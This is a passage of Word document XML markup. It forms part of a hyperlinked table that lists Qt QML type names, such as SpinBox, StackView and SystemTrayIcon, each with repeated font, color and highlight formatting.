                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Slider: QtQuickControls2</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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SliderStyle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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SmoothedAnimation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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SortPolicy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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Sound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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SoundEffect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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SoundInstance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97" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpaceKey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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SphereGeometry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299" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SphereMesh</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300" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpinBox: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301" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpinBox: QtQuickControls2</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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpinBoxStyle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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SplineSeries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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SplitView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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpotLight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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpringAnimation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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Sprite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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpriteGoal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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SpriteSequence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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Stack</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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StackedBarSeries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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StackLayout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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StackView: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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StackView: QtQuickControls2</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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StackViewDelegate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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StandardPaths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317" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>State: QtQml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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>State: QtQuick</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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StateChangeScript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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StateGroup</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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StateMachine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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StateMachineLoader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highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1323" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StatusBar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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StatusBarStyle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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StatusIndicator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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StatusIndicatorStyle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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StencilMask</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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StencilOperation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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StencilOperationArguments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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StencilTest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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>StencilTestArguments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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Store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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>String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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>string</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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Supplier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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Surface3D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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Surface3DSeries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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SurfaceDataProxy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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SwipeDelegate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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SwipeView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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Switch: QtQuickControls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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Switch: QtQuickControls2</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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SwitchDelegate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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SwitchStyle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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SymbolModeKey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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SystemPalette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347" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SystemTrayIcon</w:t>
              </w:r>
            </w:hyperlink>
            <w:bookmarkStart w:id="1181" w:name="t"/>
            <w:bookmarkEnd w:id="1181"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2995" w:type="dxa"/>
